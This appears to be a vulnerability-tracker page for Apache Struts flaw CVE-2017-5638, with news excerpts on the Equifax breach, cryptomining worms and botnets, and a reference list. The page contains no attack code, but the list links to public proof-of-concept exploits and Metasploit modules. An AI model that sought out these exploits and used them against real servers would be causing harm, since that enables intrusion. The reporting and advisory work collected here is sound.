BleepingComputer • Ionut Ilascu • 25 Apr 2019

A cryptojacking campaign uses NSA's leaked DoublePulsar backdoor and the EternalBlue exploit to spread a file-based cryptocurrency malware on enterprise networks in China.
Dubbed Beapy by researchers at Symantec, the campaign was reported by other security companies before. Qihoo 360's research team published details about it and a Trend Micro report followed in mid-April.
However, information from Symantec adds details about the type of victims and attacker's motivation to use a fi...

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2019

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

New Mirai Variant Comes with 27 Exploits, Targets Enterprise Devices
BleepingComputer • Sergiu Gatlan • 18 Mar 2019

A new Mirai variant comes with eleven new exploits, the enterprise WePresent WiPG-1000 Wireless Presentation system and the LG Supersign TV being the most notable new devices being targeted.
A previous report by Palo Alto Networks' Unit 42 from September saw a strain of the Mirai botnet switching targets to attack Apache Struts servers using an exploit also employed during last year's Equifax breach, while a new Gafgyt version was observed while assailing SonicWall firewalls, as ...

Mirai, Gafgyt IoT Botnets Reach To the Enterprise Sector
BleepingComputer • Ionut Ilascu • 11 Sep 2018

Mirai and Gafgyt, two of the best known IoT botnets, have forked once again, with the new variants peeking at the enterprise sector for creating or replenishing their denial-of-service resources for distributed attacks.
The code for both malware pieces reached the public space a few years back and aspiring cybercriminals began spawning their own revisions.
Most of the time there is nothing interesting about the mutations, but the latest alternatives show a predilection for business ...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776
BleepingComputer • Catalin Cimpanu • 28 Aug 2018

After last week a security researcher revealed a vulnerability in Apache Struts, a piece of very popular enterprise software, active exploitation attempts have started this week.
The vulnerability in question is tracked as CVE-2018-11776, a remote code execution flaw that allows an attacker to gain control over Struts-based web applications.
The vulnerability is not exploitable in default Struts configurations, according to an analysis by Palo Alto Networks, but the flaw is of intere...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

New MassMiner Malware Targets Web Servers With an Assortment of Exploits
BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign —which they dubbed MassMiner— uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excell...

Equifax Adds 2.4 Million More People to List of Those Impacted By 2017 Breach
Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

Malware Epidemic: Monero Mining Campaigns Are Becoming a Real Problem
BleepingComputer • Catalin Cimpanu • 25 Jan 2018

Malware that secretly mines Monero is becoming a real problem in the real world, with the number of different incidents growing with each week. For example, only this past week, three new attacks came to light.
The reason is simple and is the same one given by all security experts who paid close attention to the cryptocurrency market in the past year.
The number of malware campaigns spreading Monero-mining threats grew exponentially with Monero's trading price. As the price rose, the...

"Zealot" Campaign Uses NSA Exploits to Mine Monero on Windows and Linux Servers
BleepingComputer • Catalin Cimpanu • 16 Dec 2017

An aggressive and sophisticated malware campaign is currently underway, targeting Linux and Windows servers with an assortment of exploits with the goal of installing malware that mines the Monero cryptocurrency.
The campaign was detected by security researchers from F5 Networks, who named it Zealot, after zealot.zip, one of the files dropped on targeted servers.
According to Maxim Zavodchik and Liron Segal, two security researchers for F5 Networks, the attackers are scanning the Int...

IRS tax bods tell Americans to chill out about Equifax
The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

Oracle Patches 250 Bugs in Quarterly Critical Patch Update
Threatpost • Tom Spring • 17 Oct 2017

Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

Sole Equifax security worker at fault for failed patch, says former CEO
The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

Equifax couldn't find or patch vulnerable Struts implementations
The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug
Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too
The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down
The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the attack hit the company's “U.S. o...

Equifax Releases New Information About Security Breach as Top Execs Step Down
BleepingComputer • Catalin Cimpanu • 16 Sep 2017

In a press release published late Friday night, credit rating and reporting firm Equifax revealed new details about the security breach that exposed the personal details of over 143 million users, and also announced the immediate retirement of two high-ranking executives.
Equifax says that breach came to light on July 29 when its security team observed suspicious traffic from its US online dispute portal. Its security team blocked the traffic, but the next day, July 30, more suspicious act...

Equifax mega-breach: Security bod flags header config conflict
The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

Equifax Confirms March Struts Vulnerability Behind Breach
Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

Missed patch caused Equifax data breach
The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May...

Equifax Confirms Hackers Used Apache Struts Vulnerability to Breach Its Servers
BleepingComputer • Catalin Cimpanu • 14 Sep 2017

In an update posted to its security breach website, Equifax said hackers used an Apache Struts security bug to breach its servers and later steal data on over 143 million customers, from both the US and the UK. We quote:
Equifax's confirmation comes after a report from equity research firm Baird circulated last week blaming the same flaw.
At the time it was discovered, in March 2017, the Apache Struts CVE-2017-5638 vulnerability was a zero-day — a term used to describe security bug...

Credit reference agencies faulted for poor patching
The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

Apache Foundation Refutes Involvement in Equifax Breach
Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

Apache Struts Vulnerabilities May Affect Many of Cisco's Products
BleepingComputer • Catalin Cimpanu • 11 Sep 2017

Cisco has initiated a mass security audit of all its products that incorporate a version of the Apache Struts framework, recently affected by a series of vulnerabilities, one of which is under active exploitation.
Cisco engineers will test all the software products for four Apache Struts security bugs disclosed last week.
The company is keeping a list of To-Be-Tested, Vulnerable, and Confirmed Not Vulnerable products in two security advisories, here and here.
The first Cisco se...

Patch Released for Critical Apache Struts Bug
Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

Ransomware Gang Made Over $100,000 by Exploiting Apache Struts Zero-Day
BleepingComputer • Catalin Cimpanu • 06 Apr 2017

For more than a month, at least ten groups of attackers have been compromising systems running applications built with Apache Struts and installing backdoors, DDoS bots, cryptocurrency miners, or ransomware, depending if the machine is running Linux or Windows.
For their attacks, the groups are using a zero-day in Apache Struts, disclosed and immediately fixed last month by Apache.
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the server via content uplo...

Attacks Heating Up Against Apache Struts 2 Vulnerability
Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

Apache Struts 2 needs patching, without delay. It's under attack now
The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...

Apache Struts Zero-Day Exploited in the Wild
BleepingComputer • Catalin Cimpanu • 09 Mar 2017

Cisco's Talos security team announced it discovered attacks against a zero-day vulnerability in Apache Struts, which Apache patched on Monday.
According to its website, "Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON."
The vulnerability, CVE-2017-5638, allows an attacker to execute commands o...

References

CWE-20

http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securityfocus.com/bid/96729
http://www.securitytracker.com/id/1037973
https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
https://cwiki.apache.org/confluence/display/WW/S2-045
https://cwiki.apache.org/confluence/display/WW/S2-046
https://exploit-db.com/exploits/41570
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228
https://github.com/mazen160/struts-pwn
https://github.com/rapid7/metasploit-framework/issues/8064
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_us
https://isc.sans.edu/diary/22169
https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
https://packetstormsecurity.com/files/141494/S2-45-poc.py.txt
https://security.netapp.com/advisory/ntap-20170310-0001/
https://struts.apache.org/docs/s2-045.html
https://struts.apache.org/docs/s2-046.html
https://support.lenovo.com/us/en/product_security/len-14200
https://twitter.com/theog150/status/841146956135124993
https://www.exploit-db.com/exploits/41614/
https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
https://www.kb.cert.org/vuls/id/834067
https://www.symantec.com/security-center/network-protection-security-advisories/SA145
https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2017-5638
https://tools.cisco.com/security/center/viewAlert.x?alertId=52972
https://www.exploit-db.com/exploits/41570/
https://nvd.nist.gov